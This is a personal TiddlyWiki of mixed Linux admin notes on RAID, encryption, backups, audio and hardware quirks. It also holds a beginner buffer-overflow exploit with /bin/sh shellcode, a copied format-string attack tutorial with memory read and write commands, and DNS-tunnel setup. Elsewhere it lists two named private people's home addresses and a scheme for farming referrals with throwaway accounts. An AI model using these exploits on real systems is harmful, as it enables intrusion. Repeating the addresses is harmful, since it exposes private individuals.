Knowledge Base -

!static network
+{{{
+auto eth1 # come up automatically
+iface et1 inet static
+  address 192.168.0.24
+  netmask 255.255.255.0
+#  gateway 192.168.0.23
+}}}
+! for wpa_supplicant
+{{{
+auto wlan0
+allow-hotplug wlan0
+iface wlan0 inet dhcp
+    wpa-ssid meinessid
+    wpa-psk meinpasswort
+}}}

Type the text for '16 May 2013'

!usb hotplugging
+hotfix for not nonfuct hotplugging (which is probably a problem with either laptop-mode,udev,dbus or usb-autosuspend)
+{{{
+modprobe -r uhci-hcd
+modprobe uhci-hcd
+}}}
+!brightness
+/sys/class/backlight/acpi_video0/brightness
+!fan control
+via module acerhdf_kmod ( http://piie.net/index.php?section=acerhdf )
+add line for my bios to the array of supported hw in acerhdf.c :
+{{{
+/* Acer 1810TZ */
+/// changed in new version
+
+{"Acer", "Aspire 1810TZ", "v0.3108", 0x55, 0x58, {0x9e,  0x00} },
+{"Acer", "Aspire 1810TZ", "v0.3113", 0x55, 0x58, {0x9e,  0x00} },
+{"Acer", "Aspire 1810TZ", "v0.3115", 0x55, 0x58, {0x9e,  0x00} },
+{"Acer", "Aspire 1810TZ", "v0.3117", 0x55, 0x58, {0x9e,  0x00} },
+
+}}}
+!Synaptic Touchpad
+Fix crappy touchpad, enable twofinger scrolling
+in {{{ /etc/X11/xorg.conf.d/96-synaptics-twofinger.conf }}}
+{{{
+Section "InputClass"
+Identifier "touchpad two finger scrolling"
+MatchIsTouchpad "on"
+MatchDevicePath "/dev/input/event*"
+Option "HorizScrollDelta" "0"
+Option "MinSpeed" "0.5"
+Option "MaxSpeed" "0.5"
+#Option "AccelFactor" "0.0010"
+Option "EmulateTwoFingerMinZ" "40"
+Option "EmulateTwoFingerMinW" "11"
+Option "VertTwoFingerScroll" "True"
+Option "HorizTwoFingerScroll" "True"
+Option "VertEdgeScroll" "False"
+Option "HorizEdgeScroll" "False"
+Option "JumpyCursorThreshold" "250"
+Driver "synaptics"
+EndSection
+}}}

<<list>>

! asoundrc
+!! find <card>,<device>
+see aplay -l
+!! get hdmi sound working
+in /etc/asoundrc (or ~/.asoundrc )
+{{{
+pcm.!default {
+   type plug
+   slave {
+       pcm "hw:<card>,<device>"
+       rate 48000
+   }
+}
+}}}
+!! use dmix instead of direct device
+
+{{{
+pcm.dmixer {
+   type dmix
+   ipc_key 1024
+   ipc_key_add_uid false
+   ipc_perm 0660
+   slave {
+      pcm "hw:0,0"
+      rate 48000
+      channels 2
+      format S32_LE
+      period_time 0
+      period_size 1024
+      buffer_time 0
+      buffer_size 4096
+   }
+}
+
+pcm.!default {
+   type plug
+   slave.pcm "dmixer"
+}
+}}}
+! mplayer with different device
+{{{
+mplayer -ao alsa:device=bluetooth FILE # play over bluetooth
+mplayer -ao alsa:device=hw=2.0 FILE    # play over different hardware card (like usb audio)
+}}}

! generate credentials
+go to https://aws-portal.amazon.com/gp/aws/developer/account/index.html
+! install ec2 webservices
+{{{
+#? /bin/bash
+wget http://s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip
+unzip ec2-api-tools.zip
+mv ec2-api-tools .ec2
+
+echo "mv ~/Downloads/*.pem .ec2"
+read "you will probably need to do this"
+cd .ec2
+cat > change_env << EOF
+export EC2_HOME=~/.ec2
+export PATH=$PATH:$EC2_HOME/bin
+export EC2_PRIVATE_KEY=`ls $EC2_HOME/pk-*.pem`
+export EC2_CERT=`ls $EC2_HOME/cert-*.pem`
+export JAVA_HOME=/opt/java/jre
+EOF
+source change_env
+ec2-describe-images -o amazon
+ec2-create-keypair bobkhan >bobkhan.pem
+ 
+ec2-authorize default -p 22
+}}}
+! create instance
+
+{{{
+cd
+source .ec2/change_env
+ec2-run-instances ami-8c1fece5 -k bobkhan -t t1.micro
+ec2-describe-instances
+#look for the global dns name
+ssh -i bobkhan.pem ec2-user@$ec2-instance-name
+}}}
+

! using binwalk
+!! extract filesystem
+{{{
+$ binwalk openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-sysupgrade.bin
+
+DECIMAL   	HEX       	DESCRIPTION
+-------------------------------------------------------------------------------------------------------------------
+512       	0x200     	LZMA compressed data, properties: 0x6D, dictionary size: 8388608 bytes, uncompressed size: 2910740 bytes
+957612    	0xE9CAC   	Squashfs filesystem, little endian, version 4.0, compression:  size: 2356427 bytes,  653 inodes, blocksize: 262144 bytes, created: Mon Sep 23 20:26:40 2013
+$ dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-sysupgrade.bin skip=957612 bs=1 of=fs.squashfs
+$ unsquashfs fs.squashfs
+
+}}}
+!! Entropy analysis
+{{{
+binwalk -E binary
+}}}

! Melissa Tiono 
+!! Zuhause
+Ludwig-Roselius-Allee 89
+28329 Bremen
+
+Haltestelle: Wilhelm busch weg
+
+! Silvia Richter
+Dahmestr. 8
+Haltestelle: Joachimstr

!Troubleshooting
+* Rauschen
+* check with:
+{{{ arecord -D bluetooth -f S16_LE | aplay -D bluetooth  -f S16_LE}}}
+* physically disconnect bluetooth and connect again
+* unpair headset
+{{{/etc/rc.d/bluetooth restart}}}
+{{{bluetooth-applet}}} # connect to bt-headset again
+//check again
+

! TFTP Flashing
+Problem:
+- The Error LED is blinking 6x short (No firmware found)
+
+!! Bring into Recovery Mode
+{{{
+ifconfig eth0 192.168.11.1 up
+ethtool eth0 # just to see if ethernet is working and link is up
+
+# the TFTP Boot stuff
+wget -O tftp.rar http://download.discountnetz.com/tftp-boot-recovery/TFTP%20Boot%20Recovery%201.53.rar
+unrar x tftp.rar 
+cd TFTP*
+sudo in.tftpd -l -s -L $PWD
+# press the "function Button", the blue Power LED is blinking
+}}}
+!! Flash The new Firmware
+{{{
+(Shell 1) dnsmasq -d --dhcp-range=192.168.11.50,192.168.11.150,12h
+(Shell 2) 
+# The firmware plus updater
+wget -o ls.zip http://cdn.cloudfiles.mosso.com/c85091/ls_series-164.zip
+unzip ls.zip
+cd ls_series*
+
+sed -i 's/NoFormatting.*/NoFormatting = 0/' LSUpdater.ini
+# optionally echo 'Debug = 1' >> LSUpdater.ini
+
+pacman -S wine 
+# Cross Fingers
+wine LSUpdater.exe
+# Yes Yes Yes, Wait for quite some time
+# LinkStation will reboot, flash red again, press function again, LinkStation will blink somewhat different -> Success
+}}}
+
+!! More Tips:
+- FAQ 1: http://forums.buffalotech.com/t5/Storage/FAQ-1-of-5-EM-Mode-boot-procedures/td-p/100313
+- FAQ 2: http://forums.buffalotech.com/t5/Storage/FAQ-2-of-5-Force-Firmware-update-procedure/td-p/100317
+- FAQ 3: http://forums.buffalotech.com/t5/Storage/FAQ-3-of-5-TFTP-boot-procedure/td-p/100319
+

!my first BOF
+
+http://smashthestack.org/l3thal/bof.txt
+$ vuln.c
+int main(int argc, char * argv[]) {
+
+char buf[256];
+
+ie(argc == 1) {
+printf("Usage: %s input\n", argv[0]);
+exit(0);
+}
+
+strcpy(buf,argv[1]);
+printf("%s", buf);
+
+}
+./vuln `perl -e 'print "\x90"x244 ."\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
+## we create a nop-bridge, trying to hit "deadbeef" directly
+## this will be buffer+padding-shellcode(25 byte)
+## check via
+## gdb -c core.17916
+## #0  0x41414141 in ?? ()
+## (gdb) i r <= info register
+## after 0  0xdeadbeef in ?? ()
+## find the nop bridge, hit in it
+## (gdb) x/10s $esp
+...
+0xbfffd8fc:  '\220' <repeats 200 times>   <= nops
+...
+## just hit in the middle of it
+
+./vuln `perl -e 'print "\x90"x244 ."\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" . "\xef\xbe\xad\xde"'`
+

Value Proposition
+Common Baseline
+Customer Benefit
+Transformation Plan
+Integration Services
+Managed Services
+Stakeholder
+Definition and Design of Transformation Roadmap
+Key Solutions
+Customer Intimacy
+Domain Expertise
+Opportunity
+Qualification
+Contracting
+High-profile
+Budgetary Offer
+Upscope
+Outtasking
+Benchmark
+Traction

! Quirks
+Firefox 100 percent:
+    position:absolute

!Dump stuff collected
+!! Skytraq + Configuration
+{{{
+svn checkout http://skytraq-datalogger.googlecode.com/svn/trunk/ skytraq-datalogger
+make
+./skytraq-datalogger --dump > here.gpx
+}}}
+!! GPSBabel
+{{{
+gpsbabel -t -i skytraq -f /dev/ttyUSB0 -ogpx -F here.gpx
+}}}
+!Mapping it
+http://www.gpsvisualizer.com/map_input?form=google

! Working ssh
+{{{
+# create password:
+# echo -n lolwut | mkpasswd -s
+in kernel line:
+    usercrypted=<created-password> ocs_daemonon=ssh
+
+ssh user@ip-addr
+# get into menu
+CURRENT_TTY=/dev/tty1 /opt/drbl/sbin/ocs-live-general
+}}}

- http://www.pwcrack.com/penetration_contract.shtml
+- http://seclists.org/pen-test/2005/Jun/307
+- http://www.pentest-standard.org/index.php/Pre-engagement

!Server-Side
+{{{
+useradd -r tun
+iodined -f 172.16.0.1 io.krebsco.de -u tun -P "aidsballs" -t /home/tun -c
+}}}
+!Client-Side
+{{{
+# -r skips direct mode (good for testing)
+sudo iodine -f -I1 io.krebsco.de
+}}}
+! Testing
+http://code.kryo.se/iodine/check-it/

http://dnscurve.org/dnssecamp.html

http://dx.com
+
+! affiliate
+add : ?Utm_rid=93398939&Utm_source=affiliate
+e.g: https://dx.com/p/2-0-lcd-display-electromagnetic-radiation-detector-black-1-x-6f22-170486?Utm_rid=93398939&Utm_source=affiliate

!Reconfigure packages
+{{{
+dpkg-reconfigure <package-name>
+}}}
+!updating rc.d on startup
+{{{
+update-rc.d 
+or
+sysv-rc-conf
+}}}
+! Change Keyboard Layout:
+{{{
+dpkg-reconfigure console-setup
+}}}

[[Index]]
+[[TODO]]

[[pandaboard]]
+[[beagleboard]]
+[[Minimus AVR]]

! Installation 
+Debian: http://www.dokuwiki.org/install:debian

!SSH on dotcloud
+create DSA Key
+{{{
+ssh -i ~/.ssh/here.dsa dotcloud@tinc.krebs.dotcloud.com -p 5960
+}}}

! generate a new referral
+1. Generate a new account (mail not necessary
+Probably with anonbox script for mail
+2. 
+{{{
+#? /bin/bash
+ec2-describe-instances
+ssh -i bobkhan  ec2-user@$EC2_INSTANCE
+
+wget -O dropbox.tar.gz "http://www.dropbox.com/download/?plat=lnx.x86"
+tar -tzf dropbox.tar.gz
+~/.dropbox-dist/dropboxd
+# click the link
+}}}

! install
+{{{
+#?/bin/sh
+# pacman -S /apt-get install / yum install duplicity gpg pwgen
+wget http://downloads.sourceforge.net/project/ftplicity/duply%20%28simple%20duplicity%29/1.5.x/duply_1.5.10.tgz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fftplicity%2F%3Fsource%3Ddlp&ts=1372694343&use_mirror=hivelocity -O duply.tgz
+tar xf duply.tar.gz /tmp
+mkdir ~/bin
+cp -a /tmp/duply_1.5.10/duply ~/bin
+}}}
+! configure
+{{{
+pwgen 24 # take the first
+gpg --gen-key
+# click through
+# in other shell to generate entropy
+# $ find /var/ /usr /lib /srv -type f -print0 | xargs -0 cat > /dev/null
+gpg --list-secret-key 
+# take the sec/[part]
+duply remote create
+cd ~/.duply/remote/
+cat > conf <<EOF
+GPG_KEY="[part]"
+GPG_PW="[the first]"
+TARGET="[[see schemes]]"
+SOURCE="/" # full backup
+VERBOSITY=5
+MAX_FULLBKP_AGE=1m # create full backups every month
+EOF
+
+# for full backup
+cat > exclude <<EOF
+/mnt
+/tmp
+/dev
+/sys
+/proc
+/run
+/media
+/var/
+/root/.cache/duplicity
+EOF
+
+# backup $PWD folder somewhere safe
+}}}
+! scheduling
+{{{
+echo "duply remote backup" > /etc/cron.daily/duply-remote
+chmod +x /etc/cron.daily/duply-remote
+}}}
+! schemes
+{{{
+#   file:///some_dir
+#   ftp://user[:password]@other.host[:port]/some_dir
+#   hsi://user[:password]@other.host/some_dir
+#   cf+http://container_name
+#   imap://user[:password]@host.com[/from_address_prefix]
+#   imaps://user[:password]@host.com[/from_address_prefix]
+#   rsync://user[:password]@other.host[:port]::/module/some_dir
+#   rsync://user[:password]@other.host[:port]/relative_path
+#   rsync://user[:password]@other.host[:port]//absolute_path
+#   # for the s3 user/password are AWS_ACCESS_KEY_ID/AWS_SECRET_ACCESS_KEY
+#   s3://[user:password]@host/bucket_name[/prefix]
+#   s3+http://[user:password]@bucket_name[/prefix]
+#   scp://user[:password]@other.host[:port]/some_dir
+#   ssh://user[:password]@other.host[:port]/some_dir
+#   tahoe://alias/directory
+#   webdav://user[:password]@other.host/some_dir
+#   webdavs://user[:password]@other.host/some_dir
+}}}
+
+! Get the shit out again with duplicity on another host
+{{{
+cd .duply/backup
+gpg --import < gpgkey.<HEX>.sec.asc
+grep GPG_PW conf
+duplicity --encrypt-key=<HEX> --archive-dir=other-archivedir --name=darth --tempdir=other-tempdir  restore --file-to-restore path/to/file/in/archive  file://. path/to/restore
+}}}
+

! generate entropy
+!! haveged
+{{{
+pacman -S haveged
+systemctl start haveged
+}}}
+!! rng-tools
+{{{
+pacman -S rng-utils
+rngd -f -r /dev/urandom
+}}}

! Testing without Environment
+for example for cron scripts to unset all the environment variables
+{{{
+env -i /bin/sh
+}}}
+!Proxies
+in /etc/bash.bashrc
+{{{
+export http_proxy=http://.../
+export https_proxy=http://.../
+export ftp_proxy=ftp://.../
+}}}
+in /etc/apt/apt.conf.d/01proxy
+{{{
+Acquire::http::Proxy "http://host:3128";
+}}}

Check Antivirus Vendors: http://www.virustotal.com

[[Buffer Overflows]]
+[[Format String Attack]]
+[[DNSSec Amplification]]

* 26 zoll
+!Gangschaltung
+* Shimano
+* Diore (LX)
+!Bremsen
+* Vbrake
+!Rahmen
+* Alurahmen
+{{{
+                          	Mountainbike	                        Rennrad	        Tourenrad/Citybike	Trekking-/Reiserad
+Körpergröße (cm)	Rahmen (cm)	Rahmen (Zoll)	Rahmen (cm)	Rahmen (cm)	Rahmen (Zoll)	Rahmen (cm)
+175-180	                43-46	         17-18	         55-57	        48-54	         19-21	         55-58
+180-185	                46-48	         18-19	         57-60	        54                      21	                 58-61
+185-190	                48-53	         19-21	         60-62	        54-57	          21-22	         61-63
+}}}
+! Federgabe
+*

! umount
+{{{
+fuser -amuv /path/to/mount
+kill dat-shit
+}}}
+! umount nfs
+{{{
+umount -l /path/to/nfs
+}}}

From http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html (too bad the page is down)
+<html>
+<table border="1" align="center" width="70%">
+		<tbody><tr>
+			<td> Attack Name:</td>
+			<td> <b>Format String <Attack</b> </td>
+		</tr>
+		<tr>
+			<td> What does the attack accomplish?</td>
+			<td><ul>
+				<li> Reading or Writing at arbitary locations in memory (including stack)</li>
+				<li> Code Execution: Inserting shellcode into stack and changing the return address (without buffer overflow)</li>
+			   </ul>
+			</td>	
+			
+		</tr>
+		<tr>
+			<td> What is the vulnerability?</td>
+			<td> Code containing <pre>printf(variable);</pre>  instead of <pre>printf("%s",variable);</pre> where variable is affected by user 					input</td>
+		</tr>
+		<tr>
+			<td> Background</td>
+			<td> The printf function in c takes variable number of arguments. The first argument is usually the "format string", followed by 					variables referenced in the format string.<br><br> For eg. <pre>printf("There are %d numbers in %s",arg1,arg2);</pre> Here 					%d and %s are the parameter specifiers in the format string. The first specifier uses arg1 and the second uses arg2.
+				<br><br>
+				During a call to printf, these arguments are passed on the stack (in the stack frame of printf). Here is the process of 				execution.
+				<ul>
+				<li>First of all, printf reads the first argument (format string).</li>
+				<li>It prints all characters execept those that start with '%'</li>
+				<li>On seeing '%' (i.e. parameter specifier), it fetches the next argument(here arg1) from the stack.</li>
+				<li>It will typecast argument according to the specifier and then print it.</li>
+				<li>This all continues till the end of the format string</li>
+				</ul>
+				<br><br>
+				Common specifiers:
+				<table>
+					<tbody><tr><td>%d</td><td>Reads a demical integer</td></tr>
+					<tr><td>%ld</td><td>Reads a long demical integer</td></tr>
+					<tr><td>%c</td><td>Reads a character</td></tr>		
+					<tr><td>%x</td><td>Reads a hexademical integer</td></tr>
+					<tr><td>%lx</td><td>Reads a long hexademical integer</td></tr>
+					<tr><td>%s</td><td>Reads a String</td></tr>
+					<tr><td>%n</td><td>Writes the number of characters printed till now</td></tr>
+				</tbody></table>				
+				<br>
+				*In case of %s and %n Addresses of variable are stored in stack.				
+			</td>
+		</tr>
+		<tr>
+			<td> How does it works?</td>
+			<td> 
+			     To understand the vulnerability, let us try this small code first.
+<pre>int main(){
+int i=21;
+int j=5;
+printf("%d %d %d %d %d %d %d %d %d\n");
+return 0;
+}
+
+output:
+-1890278264 -1890278248 0 -2066296096 -2090799136 -1890278272 21 0 -2069764746
+</pre>
+		      
+			Even though there are no more arguments to printf, the code worked. The output may look as garbage values, but these values come 				from the stack. As can be noticed, value of i (21) is also in the output. To confirm it, change value of i and rerun.
+
+			<br><br>
+			Also as we know <pre>printf(str); //works</pre> 	
+			If that 'str' is input from user, then user can enter string containing format specifiers, rather than normal string.		
+			This is the basis of format string attack.		
+
+			<br> So for example
+			<pre>int main(int argc, const char * argv[]){
+	char buf[160];
+	strcpy(buf,argv[1]);
+	printf(buf);
+	exit(0);
+}
+
+Run:
+./a.out "hello %d"
+output:
+hello 2126824952
+
+
+			</pre>
+
+			</td>
+		</tr>
+		<tr>
+			<td> Attack Details: Reading from stack </td>
+			<td>
+			     Reading from stack using format string is easy. We just have to use the format specifiers.
+			     <br><br>For eg <a name="example1">"example1"</a>
+<pre>int main(int argc, const char * argv[]){
+	
+	int i=3;
+        int j=4;
+	int k=5;
+	int l=6;
+	char buf[160];
+	strcpy(buf,argv[1]);
+	printf(buf);
+	exit(0);
+}
+</pre>	
+			Crafting input
+			<br>
+			1)Using perl to get the string %08x %08x ... %08x (20 times) (here 20 is just a choice) 
+
+<pre>./example1 "`perl -e 'print "%08x " x 20 '`" 
+
+output:
+14fa05f0 14f9eaf4 00000000 fefefeff 00000000 14f9ec18 00000000 78383025 30252078 20783830 38302520 25207838 78383025 
+30252078 20783830 38302520 25207838 78383025 30252078 20783830 
+</pre>
+			See that 25 30 38 78 20  are getting repeated again and again in the end. These bytes are nothing but hexademical representation of 				ascii for "%08 " 
+			<br>
+			<br>
+			That means we are reading variable buf from stack frame. 
+			Variable buf starts at the 8th %08x and its size is 160bytes. So it will take 20 "%08x" on 64bit machine. In case of 32 bit 				machine, it will take 40. (See <a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#Idiosyncrasy">Idiosyncrasy</a> for more details)
+			<br>
+
+			So in case of a 64 bit machine, variable i will be at 28th parameter. Lets check it out.
+			<br><br>
+			2)Directly reading 28th parameter
+<pre>./example1 "%28\$d"
+
+output:
+3  
+</pre>
+			where 3 is value of variable i. <br>
+			As can bee seen, to directly access mth parameter use %m$d. The '\' was used to escape $ from bash shell.
+			<br>
+			Please note that on 64bit system, 29th parameter will not be j but will be k. To know why, see 						<a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#Idiosyncrasy">Idiosyncrasy</a>.
+			</td>
+		</tr>	
+		<tr>
+			<td> Attack Details: Reading from arbitary memory address</td>
+			<td>
+				Remember that %s and %n works on addresses rather than values. Out of these two %s is the one that can read. So we need to 					place the address of the memory location on stack, and then call %s to read content of that location.
+			     <br><br>Consider eg <a name="example2">"example2"</a>
+<pre>char hiddencode[4];
+
+int main(int argc, const char * argv[]){
+	strcpy(hiddencode,"007");
+	printf("hidden code is at %p. Find the value of hidden code.\n",&amp;hiddencode);
+	char buf[160];
+	strcpy(buf,argv[1]);
+	printf(buf);
+	exit(0);
+}
+</pre>
+			The varible buf is on the stack. As the argument we pass will be copied in buf, we now have a way to insert the address in to the 				stack i.e. Placing the address in the format string itself.<br>
+			If you run the program with any input, it will print address of variable hidden code.
+<pre>./example2 a
+
+output:
+hidden code is at 0x600a30. Find the value of hidden code.
+a
+</pre>
+			So now we know that the address to read from is 0x00600a30. For attack to work, this address should be part of the format string.We 				are lucky that the Null byte is at the highest order byte. We cannot have null byte in our input string (because that marks the end 				of that string). As i am using a little endian machine, bytes ordering is reversed. And so Highest order byte is to be inputed at 				last.(ie input will be  30 0a 60 00). So this should be the last 4 bytes of our format string.
+
+			<br>Now try the following:
+<pre>./example2 "%09\$s   `printf "\x30\x0a\x60"`"
+
+output:
+hidden code is at 0x600a30. Find the value of hidden code.
+007   0
+</pre>
+			As you can see, we got 007. Let us understand how. 
+			<br>
+			We know that buf starts at the 8th parameter on 64bit system. So we place the address on 9th parameter and called %s for 9th 				parameter. If we had started by putting address on 8th parameter, then null byte would have caused trouble. Also note the use of 				spaces to start the address on next word(8bytes for 64bit system) 
+			</td>
+		</tr>
+		<tr>
+			<td> Attack Details: Writing at arbitary memory address </td>
+			<td>
+				Here we will use %n instead of %s on the above >example. To make sure we have modified the variable add a printf after 					printf(buf);
+<pre>printf("%s",hiddencode);
+</pre>
+			<br> To make the hidden code null, do this
+<pre>./example2 "%09\$n   `printf "\x30\x0a\x60"`"
+</pre>
+		%n will write at 00600a30. It will write the value 0 because no character is yet printed by printf. To write other values, you must preceed 			%n with some text or format characters. Quick way to get 5 there, is "%5c%09\$n`printf "\x30\x0a\x60"`". Also that address should be 			aligned to start from a new word(8bytes for 64bit system). Use spaces to solve this. 
+		</td>
+		</tr>
+		<tr>
+			<td>Difficulties</td>
+			<td>
+				<ul>
+				<li> If the address that needs to be written contains Null byte, it may become impossible to write</li>
+				<li> To execute shellcode, there should be a page in memory that is both writable and executable</li>
+				<li> It is difficult to know address of a variable or a function, without debugging source code</li>
+				</ul>
+			</td>		
+		</tr>
+
+		<tr>
+			<td><a name="Idiosyncrasy">Idiosyncrasy</a></td>
+			<td>
+				There are some differences when attacking a 32bit system as compared to a 64bit system.
+				<ul>
+					<li>When we input multiple %08x reading of buf starts at 5th parameter in 32 bit system, whereas as seen above, it 						started at 8th parameter</li>
+					<br>
+					<li>Every parameter access will fetch 4 bytes in case of 32 bit system, but it will fetch 8 bytes in 64 bit system
+					</li>
+					<br>
+
+					<li>Reconsider <a href="http://www.cse.iitb.ac.in/~jagdish/mtp/attacks/formatstring.html#example1">example1</a>
+						<br>
+						<b>For a 64 bit system</b>
+<pre>./example1 "%28\$d"
+</pre>
+						This will output value of i. 'i' is integer(4 bytes) but a parameter is 8 byte. And so there will be 						truncation of 4 bytes.
+					<br>
+					When you do,
+<pre>./example1 "%29\$d"
+</pre>
+					you will get k and not j. Reason is that value of j was fetched with that of i (then was truncated).
+					<br>
+					So what if you want to access both i and j? Instead of using %d use %lx. Because %lx will not truncate and will 					display you all the 64 bits.
+<pre>./example1 "%28\$lx"
+</pre>
+					You will get j followed by i(little endian).
+
+					<br><br>
+					<b>For a 32 bit system</b>
+ 					<br><br>
+					buf starts at 5. As each parameter is 4byte, it will end at 44 and so i will be 45th parameter.
+<pre>./example1 "%45\$d"
+</pre>
+					This will give you value of i.Variable j will be next, followed by k and l.
+<pre>./example1 "%46\$d"
+</pre>
+					This will give you value of j. And so on.
+					<br>
+					<br>
+
+					</li><li>Similarly for other attacks(read and write to memory),use %6\$n instead %9\$%n for 32 bit system (Add do watch 						the spaces that were used to complete 8bytes.)</li>
+
+					
+
+
+
+
+				</ul>
+
+			</td>		
+		</tr>
+		
+	</tbody></table>
+</html>

! FreeNas Package Installation
+{{{
+mount -o rw /
+pkg_add tinc
+mount -o ro /
+}}}

[[Buzzwords]]

To get started with this blank [[TiddlyWiki]], you'll need to modify the following tiddlers:
+* [[SiteTitle]] & [[SiteSubtitle]]: The title and subtitle of the site, as shown above (after saving, they will also appear in the browser title bar)
+* [[MainMenu]]: The menu (usually on the left)
+* [[DefaultTiddlers]]: Contains the names of the tiddlers that you want to appear when the TiddlyWiki is opened
+You'll also need to enter your username for signing your edits: <<option txtUserName>>

Also see [[Software Raid]]
+! Softraid + Crypto + LVM
+!! Level 1: Softraid
+{{{
+sudo mdadm --create /dev/md0 --level=5 --raid-devices=2 /dev/sdd1 /dev/sdb
+cat /proc/mdstat
+mdadm --misc --detail /dev/md0
+# make it faster on retard pcs
+echo 8192 > /sys/block/md*/md/stripe_cache_size
+}}}
+!! Level 2: (wait and then) Crypto
+{{{
+#             aes-cbc-essiv:sha256 is old
+cryptsetup -c aes-xts-plain64 -s 256 luksFormat /dev/md0
+cryptsetup luksOpen /dev/md0 array1
+}}}
+!! Level 3: LVM
+{{{
+pvcreate /dev/mapper/array1
+vgcreate -v cryptvg /dev/mapper/array1
+lvcreate -l 100%FREE -n files1 cryptvg
+}}}
+!! Level 4: Format
+{{{
+mkfs.ext4 /dev/cryptvg/files1
+}}}
+!! Level 5: INITRD
+!!! Archlinux
+{{{
+# in /etc/mkinitcpio.conf
+MODULES="dm_mod" # for root on softraid
+HOOKS="... udev mdadm_udev encrypt lvm2 filesystems ... "
+# in /etc/default/grub
+GRUB_CMDLINE_LINUX_DEFAULT="cryptsetup=/dev/md127:array1 quiet"
+}}}
+!! extend Raid
+{{{
+mdadm --add /dev/md0 /dev/sdx1
+mdadm --grow -n 3 /dev/md0grub
+
+cat /proc/mdstat
+mdadm --misc --detail /dev/md0
+
+pvresize /dev/mapper/array1
+cryptsetup resize array1
+lvresize -l +100%FREE /dev/vg/files1
+e2fsck -f /dev/vg/files1
+resize2fs /dev/vg/files1
+}}}
+see also [[[Western Digitial Green]]] for information about special formating
+
+! array wont assemble anymore
+!! Find the problem
+{{{
+cat /proc/mdstat
+mdadm -D --scan
+mdadm -E --scan
+mdadm -E /dev/sd[abce]1
+}}}
+!! Assemble manually
+{{{
+mdadm --stop /dev/md{0,127}
+mdadm --assemble /dev/md0 /dev/sda1 /dev/sdb1 /dev/sdc1 /dev/sde1 --force
+# /dev/sde1 fails to join the array
+}}}
+!! Add the broken device again
+{{{
+mdadm /dev/md0 --remove /dev/sde1
+mdadm /dev/md0 --re-add /dev/sde1 
+#when this fails
+    mdadm --zero-superblock /dev/sde1 #reap the device
+    mdadm /dev/md0 --add /dev/sde1
+
+echo 2000000 | sudo tee /proc/sys/dev/raid/speed_limit_min
+echo 10000000 | sudo tee /proc/sys/dev/raid/speed_limit_max
+sleep 40000
+echo "FINISHED!"
+}}}
+! reaped the lvm
+{{{
+lvremote vg # killed the volumegroup, nice one
+... # 
+vgcfgrestore -f /etc/lvm/archive/vg_00018-2146062166.vg -v vg #lvm is awesome and saves backups
+}}}

Install
+{{{pacman -S cups foomatic-{db,db-engine,filters}}}}
+goto
+{{{localhost:631/}}} and add HL2030 printer

!biohacking
+[[habanero]]
+
+!Information Gathering
+[[Metadata]]
+[[wmic]]
+!Stealth
+[[Using on-board Resources]]
+!Wifi
+[[aircrack suite]]

---

! Quirks
+[[Acer1810tz]]
+[[Lenovo T400]]
+[[Buffalo LinkStation LS-WVL]]
+!Internal
+[[Intel SSD]]
+[[Western Digitial Green]]
+!Embedded
+[[Dev Boards]]
+[[mk808]]
+!Peripheral
+[[Canmore GT-730FL-S GPS-Datalogger]]
+[[Bluetooth Headset]]
+[[RT2870 WiFi]]
+[[ReinerSCT]]
+[[HL2030]]
+[[UMTS Stick]]
+[[Logitech G15]]
+[[Silicon Images SATA Controller]]
+!Consoles
+[[Playstation2]]

! euer.krebsco.de
+Welcome to my new `Blog`.
+Feel free to browse around.
+You might find something you find interesting, or not. Latest changes are in the timeline.
+! Reach me
+Twitter: @makefoo
+IRC: irc.freenode.com #krebs

watch out for alignment:
+{{{
+fdisk -H 32 -S 32 -u /dev/sdx
+mkfs.ext4 -b 4096 -E stride=32,stripe-width=32 /dev/sdx1
+}}}
+in fstab:
+noatime

! Track Point Speed
+{{{
+# in /etc/rc.local
+echo -n 250 > /sys/devices/platform/i8042/serio1/serio2/sensitivity
+echo -n 250 > /sys/devices/platform/i8042/serio1/serio2/speed
+}}}

!Tools
+!!G15daemon
+Basics, something is working (clock)
+!! G15composer
+Startup: 
+{{{
+g15composer /tmp/g15pipe
+}}}
+Useful Commands:
+{{{
+echo 'TL "Hello" "World"' > /tmp/g15pipe #first line "hello", second line "world
+echo 'MP 0' > /tmp/g15pip # to foreground
+}}}
+! G-Keys
+{{{
+G1 - XF86AudioRecord
+G2 - XF86AudioRewind
+G3 - XF86Phone
+G4 - Keycode 178
+G5 - XF86Tools
+G6 - XF86HomePage
+[ ] - XF86AudioStop
+|<< - XF86AudioPrev
+>>| - XF86AudioNext
+>|| - XF86AudioStop
+Mute - XF86AudioMute
+M1 - XF86Launch6
+M2 - XF86Launch7
+M3 - XF86Launch8
+MR - XF86Launch9
+}}}
+! Insert into local {{{~/.Xmodmap}}}
+From {{{man g15daemon}}}
+{{{
+       keycode  93 = XF86Launch1
+       keycode 129 = XF86Launch8
+       keycode 130 = XF86Launch9
+       keycode 131 = XF86Launch2
+       keycode 132 = XF86Phone
+       keycode 133 = XF86Messenger
+       keycode 136 = XF86LaunchD
+       keycode 137 = XF86Support
+       keycode 138 = XF86Word
+       keycode 143 = XF86LaunchF
+       keycode 144 = XF86AudioPrev
+       keycode 150 = XF86LogOff
+       keycode 152 = XF86Launch5
+       keycode 153 = XF86AudioNext
+       keycode 160 = XF86AudioMute
+       keycode 161 = XF86Travel
+       keycode 162 = XF86AudioPlay
+       keycode 163 = XF86Spell
+       keycode 164 = XF86AudioStop
+       keycode 170 = XF86VendorHome
+       keycode 174 = XF86AudioLowerVolume
+       keycode 176 = XF86AudioRaiseVolume
+       keycode 177 = XF86Launch4
+       keycode 178 = XF86HomePage
+       keycode 182 = XF86Away
+       keycode 183 = XF86WebCam
+       keycode 184 = XF86Launch0
+       keycode 188 = XF86Music
+       keycode 190 = XF86Launch6
+       keycode 194 = XF86Forward
+       keycode 195 = XF86Send
+       keycode 205 = XF86Calendar
+       keycode 208 = XF86Launch7
+       keycode 209 = XF86LaunchB
+       keycode 210 = XF86LaunchC
